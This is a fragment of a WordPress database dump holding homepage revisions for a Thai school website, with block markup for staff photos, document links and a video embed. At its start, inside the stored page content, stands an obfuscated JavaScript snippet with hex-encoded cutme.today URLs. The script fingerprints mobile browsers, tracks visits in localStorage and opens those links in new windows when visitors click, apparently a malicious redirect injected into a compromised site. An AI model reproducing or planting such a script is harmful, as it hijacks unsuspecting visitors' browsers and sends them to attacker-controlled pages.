\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:30:45','2025-07-15 07:30:45','',19,'http://watprato.ssk.in.th/?p=682',0,'revision','',0),
(684,1,'2025-07-15 14:32:55','2025-07-15 07:32:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 